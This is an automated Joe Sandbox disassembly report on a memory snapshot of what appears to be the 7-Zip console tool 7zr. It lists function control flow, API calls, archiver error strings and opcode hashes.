                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: fputs$H_prolog$fflushfree
                                          • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                                          • API String ID: 1750297421-1898165966
                                          • Opcode ID: e40bc3a24a0d7892f836da7b4fa83c8449776e9ba2e23caf67780abfd9b81e59
                                          • Instruction ID: cdbca8b33a7b39b4b6b61486aca74075850d6220982691ad815d5ce58cce4720
                                          • Opcode Fuzzy Hash: e40bc3a24a0d7892f836da7b4fa83c8449776e9ba2e23caf67780abfd9b81e59
                                          • Instruction Fuzzy Hash: 88B13F306017069FDB24EFA4C995BAAB7F1FF45308F08852DE96A97291CB70AD44DF50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1565 c76c72-c76c8e call d0fb10 1568 c76c96-c76c9e 1565->1568 1569 c76c90-c76c94 1565->1569 1571 c76ca6-c76cae 1568->1571 1572 c76ca0-c76ca4 1568->1572 1569->1568 1570 c76cd3-c76cdc call c78664 1569->1570 1578 c76d87-c76d92 call c788c6 1570->1578 1579 c76ce2-c76d02 call c767f0 call c72f88 call c787df 1570->1579 1571->1570 1573 c76cb0-c76cb5 1571->1573 1572->1570 1572->1571 1573->1570 1575 c76cb7-c76cce call c767f0 call c72f88 1573->1575 1592 c7715d-c7715f 1575->1592 1587 c76f4c-c76f62 call c787fa 1578->1587 1588 c76d98-c76d9e 1578->1588 1603 c76d04-c76d09 1579->1603 1604 c76d4a-c76d61 call c77b41 1579->1604 1598 c76f67-c76f74 call c785e2 1587->1598 1599 c76f64-c76f66 1587->1599 1588->1587 1591 c76da4-c76dc7 call c72e47 * 2 1588->1591 1614 c76dd4-c76dda 1591->1614 1615 c76dc9-c76dcf 1591->1615 1595 c77118-c77126 1592->1595 1610 c76f76-c76f7c 1598->1610 1611 c76fd1-c76fd8 1598->1611 1599->1598 1603->1604 1607 c76d0b-c76d38 call c79252 1603->1607 1622 c76d67-c76d6b 1604->1622 1623 c76d63-c76d65 1604->1623 1607->1604 1632 c76d3a-c76d45 1607->1632 1610->1611 1620 c76f7e-c76f8a call c76bf5 1610->1620 1618 c76fe4-c76feb 1611->1618 1619 c76fda-c76fde 1611->1619 1616 c76df1-c76df9 call c73221 1614->1616 1617 c76ddc-c76def call c72407 1614->1617 1615->1614 1636 c76dfe-c76e0b call c787df 1616->1636 1617->1616 1617->1636 1629 c7701d-c77024 call c78782 1618->1629 1630 c76fed-c76ff7 call c76bf5 1618->1630 1619->1618 1628 c770e5-c770ea call c76868 1619->1628 1620->1628 1644 c76f90-c76f93 1620->1644 1624 c76d6d-c76d75 1622->1624 1625 c76d78 1622->1625 1633 c76d7a-c76d82 call c7764c 1623->1633 1624->1625 1625->1633 1646 c770ef-c770f3 1628->1646 1629->1628 1653 c7702a-c77035 1629->1653 1630->1628 1651 c76ffd-c77000 1630->1651 1632->1592 1649 c77116 1633->1649 1657 c76e43-c76e50 call c76c72 1636->1657 1658 c76e0d-c76e10 1636->1658 1644->1628 1652 c76f99-c76fb6 call c767f0 call c72f88 1644->1652 1647 c770f5-c770f7 1646->1647 1648 c7710c 1646->1648 1647->1648 1655 c770f9-c77102 1647->1655 1656 c7710e-c77111 call c76848 1648->1656 1649->1595 1651->1628 1659 c77006-c7701b call c767f0 1651->1659 1686 c76fc2-c76fc5 call c7717b 1652->1686 1687 c76fb8-c76fbd 1652->1687 1653->1628 1654 c7703b-c77044 call c78578 1653->1654 1654->1628 1676 c7704a-c77054 call c7717b 1654->1676 1655->1648 1662 c77104-c77107 call c7717b 1655->1662 1656->1649 1677 c76e56 1657->1677 1678 c76f3a-c76f4b call c71e40 * 2 1657->1678 1665 c76e12-c76e15 1658->1665 1666 c76e1e-c76e36 call c767f0 1658->1666 1679 c76fca-c76fcc 1659->1679 1662->1648 1665->1657 1672 c76e17-c76e1c 1665->1672 1683 c76e58-c76e7e call c72f1c call c72e04 1666->1683 1685 c76e38-c76e41 call c72fec 1666->1685 1672->1657 1672->1666 1694 c77056-c7705f call c72f88 1676->1694 1695 c77064-c77097 call c72e47 call c71089 * 2 call c76868 1676->1695 1677->1683 1678->1587 1679->1656 1703 c76e83-c76e99 call c76bb5 1683->1703 1685->1683 1686->1679 1687->1686 1705 c77155-c77158 call c76848 1694->1705 1727 c770bf-c770cc call c76bf5 1695->1727 1728 c77099-c770af wcscmp 1695->1728 1711 c76ecf-c76ed1 1703->1711 1712 c76e9b-c76e9f 1703->1712 1705->1592 1714 c76f09-c76f35 call c71e40 * 2 call c76848 call c71e40 * 2 1711->1714 1715 c76ec7-c76ec9 SetLastError 1712->1715 1716 c76ea1-c76eae call c722bf 1712->1716 1714->1649 1715->1711 1725 c76ed3-c76ed9 1716->1725 1726 c76eb0-c76ec5 call c71e40 call c72e04 1716->1726 1734 c76eec-c76f07 call c731e5 1725->1734 1735 c76edb-c76ee0 1725->1735 1726->1703 1745 c770ce-c770d1 1727->1745 1746 c77129-c77133 call c767f0 1727->1746 1731 c770b1-c770b6 1728->1731 1732 c770bb 1728->1732 1738 c77147-c77154 call c72f88 call c71e40 1731->1738 1732->1727 1734->1714 1735->1734 1740 c76ee2-c76ee8 1735->1740 1738->1705 1740->1734 1751 c770d3-c770d6 1745->1751 1752 c770d8-c770e4 call c71e40 1745->1752 1761 c77135-c77138 1746->1761 1762 c7713a 1746->1762 1751->1746 1751->1752 1752->1628 1764 c77141-c77144 1761->1764 1762->1764 1764->1738
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00C76C77
                                          • SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 00C76EC9
                                            • Part of subcall function 00C76C72: wcscmp.MSVCRT ref: 00C770A5
                                            • Part of subcall function 00C76BF5: __EH_prolog.LIBCMT ref: 00C76BFA
                                            • Part of subcall function 00C76BF5: GetFileAttributesW.KERNEL32(?,?,?,00000000,?), ref: 00C76C1A
                                            • Part of subcall function 00C76BF5: GetFileAttributesW.KERNEL32(?,00000000,?,?,00000000,?), ref: 00C76C49
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: AttributesFileH_prolog$ErrorLastwcscmp
                                          • String ID: :$DATA
                                          • API String ID: 3316598575-2587938151
                                          • Opcode ID: a6c6193370cb36d7e6040bfaf1b778c1d55c18c3c167211cbf5f85ce988ac8bf
                                          • Instruction ID: f074fee1fdf111c533dc7e921bbbf066656aeb6fa37a0c059b1e69e62fc802d1
                                          • Opcode Fuzzy Hash: a6c6193370cb36d7e6040bfaf1b778c1d55c18c3c167211cbf5f85ce988ac8bf
                                          • Instruction Fuzzy Hash: F8E124309006099BCF25EFA5C895BEEB7B1FF14314F10C619E86E672D2DB70AA49DB11
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: fputs$H_prolog
                                          • String ID: =
                                          • API String ID: 2614055831-2525689732
                                          • Opcode ID: 4e242703edbcdfbae7d5544d0fb550f7d1f60ba97f0475cca79ebbd28507ad1c
                                          • Instruction ID: a1879ee05753bb9f831296854bb70b0371f4e27c161aa941c2575509d6b5aa62
                                          • Opcode Fuzzy Hash: 4e242703edbcdfbae7d5544d0fb550f7d1f60ba97f0475cca79ebbd28507ad1c
                                          • Instruction Fuzzy Hash: 12219032904109EFCF09EB94E946BEDBBB5EF48314F24402AF805721A1DF711E45EBA0
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00CA8346
                                          • fputs.MSVCRT ref: 00CA835B
                                          • fputs.MSVCRT ref: 00CA8364
                                            • Part of subcall function 00CA83BF: __EH_prolog.LIBCMT ref: 00CA83C4
                                            • Part of subcall function 00CA83BF: fputs.MSVCRT ref: 00CA8401
                                            • Part of subcall function 00CA83BF: fputs.MSVCRT ref: 00CA8437
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: fputs$H_prolog
                                          • String ID: =
                                          • API String ID: 2614055831-2525689732
                                          • Opcode ID: d14bf6b15080d6d3785b2bde837039c1c53c2bb0c90f930c73d79284d0672173
                                          • Instruction ID: d9bdcb3b892c8589ebf4ef848c5142fcdc21a0a018dc747915f84bff2961d7f2
                                          • Opcode Fuzzy Hash: d14bf6b15080d6d3785b2bde837039c1c53c2bb0c90f930c73d79284d0672173
                                          • Instruction Fuzzy Hash: 3701D631A00009ABCF16BBA8D812AEDBF75EF84714F00801AF845922A1CF744A95EBE1
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00C9209B
                                            • Part of subcall function 00C7757D: GetLastError.KERNEL32(00C7D14C), ref: 00C7757D
                                            • Part of subcall function 00C92C6C: __EH_prolog.LIBCMT ref: 00C92C71
                                            • Part of subcall function 00C71E40: free.MSVCRT ref: 00C71E44
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: H_prolog$ErrorLastfree
                                          • String ID: Cannot find archive file$The item is a directory
                                          • API String ID: 683690243-1569138187
                                          • Opcode ID: c7df96b419209afb23e5356326e86144f72dd4067b5e6d36da126128e6bfe1f6
                                          • Instruction ID: 9b8d073137fd0a9b09d0a2ca97dd7821454124edf5da2f37e6858f2d0d5bc005
                                          • Opcode Fuzzy Hash: c7df96b419209afb23e5356326e86144f72dd4067b5e6d36da126128e6bfe1f6
                                          • Instruction Fuzzy Hash: 69723871D00258EFCF25DFA8C888BDDBBB5AF59304F14809AE899A7252C7709E81DF51
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: CountTickfputs
                                          • String ID: .
                                          • API String ID: 290905099-4150638102
                                          • Opcode ID: a22fe14f33f6a0126120296d975ae384e02160a07c3036bd3bcdcf290fe5ba0f
                                          • Instruction ID: f7678a182fdc83e98c001a6e42d2ba1a33f6080473f39452104bccd23d44bf5a
                                          • Opcode Fuzzy Hash: a22fe14f33f6a0126120296d975ae384e02160a07c3036bd3bcdcf290fe5ba0f
                                          • Instruction Fuzzy Hash: 3A713C31600B059FCB25EF74C5D1AAAB7F6BF82708F00881DE49B97681DB71BA45DB21
                                          APIs
                                            • Part of subcall function 00C79C8F: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00C79CB3
                                            • Part of subcall function 00C79C8F: GetProcAddress.KERNEL32(00000000), ref: 00C79CBA
                                            • Part of subcall function 00C79C8F: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00C79CC8
                                          • __aulldiv.LIBCMT ref: 00CB093F
                                          • __aulldiv.LIBCMT ref: 00CB094B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
                                          • String ID: 3333
                                          • API String ID: 3520896023-2924271548
                                          • Opcode ID: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                          • Instruction ID: 94158a5f7afc0ed5a9b2d2a5e48632779e3a33ddc885f4330a316653a7de6bd4
                                          • Opcode Fuzzy Hash: aa80bea9d6c22138b4e28b4c2bf2419a07f06abe99e39d7f84be716b64eca7ac
                                          • Instruction Fuzzy Hash: 382153B1D007046EE7309F6A8881B5FBAF9FB84750F24892EB18AD7642D670A9448B75
                                          APIs
                                            • Part of subcall function 00C71E40: free.MSVCRT ref: 00C71E44
                                          • memset.MSVCRT ref: 00C9AEBA
                                          • memset.MSVCRT ref: 00C9AECD
                                            • Part of subcall function 00CB04D2: _CxxThrowException.MSVCRT(?,00D24A58), ref: 00CB04F8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: memset$ExceptionThrowfree
                                          • String ID: Split
                                          • API String ID: 1404239998-1882502421
                                          • Opcode ID: 1b2807890b2a10bc2c33c7c31a40371414f9f3ba67d8c1813a8f08d945b31ab3
                                          • Instruction ID: e98b38e8304c51ba148d75335b6822fcbe25a71e9ea8baf22f0e2cb9f5edf659
                                          • Opcode Fuzzy Hash: 1b2807890b2a10bc2c33c7c31a40371414f9f3ba67d8c1813a8f08d945b31ab3
                                          • Instruction Fuzzy Hash: 32425D30A00258DFDF25DFA9C988BEDBBB1BF45304F244099E859A7251CB31AE85DF52
                                          APIs
                                          • fputs.MSVCRT ref: 00CA8437
                                          • fputs.MSVCRT ref: 00CA8401
                                            • Part of subcall function 00C71FB3: __EH_prolog.LIBCMT ref: 00C71FB8
                                          • __EH_prolog.LIBCMT ref: 00CA83C4
                                            • Part of subcall function 00C71FA0: fputc.MSVCRT ref: 00C71FA7
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: H_prologfputs$fputc
                                          • String ID:
                                          • API String ID: 678540050-0
                                          • Opcode ID: e67733a6b8e2c41a1036640d1f6cfb1a7278c36afb09f05cf35dcadefe549e7f
                                          • Instruction ID: 383f1073d0d1214c270e2530201d8ea6c8bad58b1acb7f5b0a96981a6ff1feca
                                          • Opcode Fuzzy Hash: e67733a6b8e2c41a1036640d1f6cfb1a7278c36afb09f05cf35dcadefe549e7f
                                          • Instruction Fuzzy Hash: 5F11E931F041055BCF09BBF8D813AAEBFB5EF45750F004029F905932D1CF655945AAE4
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00C92CE0
                                            • Part of subcall function 00C75E10: __EH_prolog.LIBCMT ref: 00C75E15
                                            • Part of subcall function 00C841EC: _CxxThrowException.MSVCRT(?,00D24A58), ref: 00C8421A
                                            • Part of subcall function 00C7965D: VariantClear.OLEAUT32(?), ref: 00C7967F
                                          Strings
                                          • Cannot create output directory, xrefs: 00C93070
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: H_prolog$ClearExceptionThrowVariant
                                          • String ID: Cannot create output directory
                                          • API String ID: 814188403-1181934277
                                          • Opcode ID: 295528a13cb18e6984240841d6fd20fd9de471b37c0eb26b9a000916e6801de6
                                          • Instruction ID: 13288b3a487f5e0d6f7b9535e45c648bf90aa94b24ea8d3592cf2688066afa78
                                          • Opcode Fuzzy Hash: 295528a13cb18e6984240841d6fd20fd9de471b37c0eb26b9a000916e6801de6
                                          • Instruction Fuzzy Hash: F7F1B230901289EFCF25EFA4C898AEDBBB5BF19304F14409DE49967252DB309F49DB51
                                          APIs
                                          • fputs.MSVCRT ref: 00CAC840
                                            • Part of subcall function 00C725CB: _CxxThrowException.MSVCRT(?,00D24A58), ref: 00C725ED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: ExceptionThrowfputs
                                          • String ID:
                                          • API String ID: 1334390793-399585960
                                          • Opcode ID: 8fd45f0d4f6d48394846772749f415ae76cb77fe7dcf4f9517a61fcf89ce742a
                                          • Instruction ID: d1faea3e48d3015f5750a34856cfd76452d8e6c8c891b12d648bae8e2ee53f32
                                          • Opcode Fuzzy Hash: 8fd45f0d4f6d48394846772749f415ae76cb77fe7dcf4f9517a61fcf89ce742a
                                          • Instruction Fuzzy Hash: 2511B271604745AFDB15CF58C8C1BAABBE6FF46308F04846EE156CB291C7B5B944C760
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: fputs
                                          • String ID: Open
                                          • API String ID: 1795875747-71445658
                                          • Opcode ID: 21b2841620f87274f5eb66478a96b804d066c43f0bd00f3b4478211753456464
                                          • Instruction ID: e6ae2bab351c77dab9cb2b2c93dd91af1e697306a3df992c7dd67bbf3eb56586
                                          • Opcode Fuzzy Hash: 21b2841620f87274f5eb66478a96b804d066c43f0bd00f3b4478211753456464
                                          • Instruction Fuzzy Hash: B311AC32505704AFC720EF78E991ADABBE5FF15314F44C82EE5AA83212DB31A944CF60
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00CC06B3
                                          • _CxxThrowException.MSVCRT(?,00D2D480), ref: 00CC08F2
                                            • Part of subcall function 00C71E0C: malloc.MSVCRT ref: 00C71E1F
                                            • Part of subcall function 00C71E0C: _CxxThrowException.MSVCRT(?,00D24B28), ref: 00C71E39
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: ExceptionThrow$H_prologmalloc
                                          • String ID:
                                          • API String ID: 3044594480-0
                                          • Opcode ID: 7c2c1c56fb832f5211cd2f573fd9362f9bc6721fb7f9fa0fdaca7e5f356f73df
                                          • Instruction ID: a21cb6e925b5b2558a3d1e70f6b94250ebae9bc46c40acf48d2baeb815e8cf05
                                          • Opcode Fuzzy Hash: 7c2c1c56fb832f5211cd2f573fd9362f9bc6721fb7f9fa0fdaca7e5f356f73df
                                          • Instruction Fuzzy Hash: 11913B70900249DFCF21DFA9C881EEEBBB5AF09304F248199E859A7292C7306E45DF61
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 18d550a81acc8ff2b72c8674e50c25688c2a8b3bb6b7bded599a0c594102911d
                                          • Instruction ID: e8034e55f9a418e0c3996d2463e15f4c9be5a2f7ca4890733ea35a9438b27eb0
                                          • Opcode Fuzzy Hash: 18d550a81acc8ff2b72c8674e50c25688c2a8b3bb6b7bded599a0c594102911d
                                          • Instruction Fuzzy Hash: 74F1F070500785DFCF21EF64C490AAABBF1BF14308F58486EE4AA8B211D730EE84CB59
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00C84255
                                            • Part of subcall function 00C8440B: __EH_prolog.LIBCMT ref: 00C84410
                                            • Part of subcall function 00C71E0C: malloc.MSVCRT ref: 00C71E1F
                                            • Part of subcall function 00C71E0C: _CxxThrowException.MSVCRT(?,00D24B28), ref: 00C71E39
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: H_prolog$ExceptionThrowmalloc
                                          • String ID:
                                          • API String ID: 3744649731-0
                                          • Opcode ID: eac575d2dbfb94923662283e47e57b76a38072d5e33e7cc17562a48de68739e8
                                          • Instruction ID: 41e3f047b19e81f97b95724f4f5e39f7196baa91712e30ee92cd9d88a33b7336
                                          • Opcode Fuzzy Hash: eac575d2dbfb94923662283e47e57b76a38072d5e33e7cc17562a48de68739e8
                                          • Instruction Fuzzy Hash: 0751C3B0801B88DFC325DF69D1846CAFBF0BF19304F5488AEC49A97752D7B4A648DB61
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.1734820687.0000000000C71000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000009.00000002.1734801046.0000000000C70000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734905117.0000000000D1C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734935671.0000000000D32000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000009.00000002.1734955137.0000000000D3B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_c70000_7zr.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 0743a76fcd0e951926c5b6f8c32511bb43ffeebf2cbde70de5bfd13b68a22fcc
                                          • Instruction ID: f7a1b90549af6a301c6c688c02c96eebe38547dd4dec827542f1a5fe6330cb11
                                          • Opcode Fuzzy Hash: 0743a76fcd0e951926c5b6f8c32511bb43ffeebf2cbde70de5bfd13b68a22fcc
                                          • Instruction Fuzzy Hash: 9431F7B4D00609EFCF14EF95D8958AEBBB5FF94364B20811EF82A67251C7309E51DBA0
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00C9021F
                                            • Part of subcall function 00C83D66: __EH_prolog.LIBCMT ref: 00C83D6B
                                            • Part of subcall function 00C83D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00C83D7D
                                            • Part of subcall function 00C83D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00C83D94
                                            • Part of subcall function 00C83D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00C83DB6
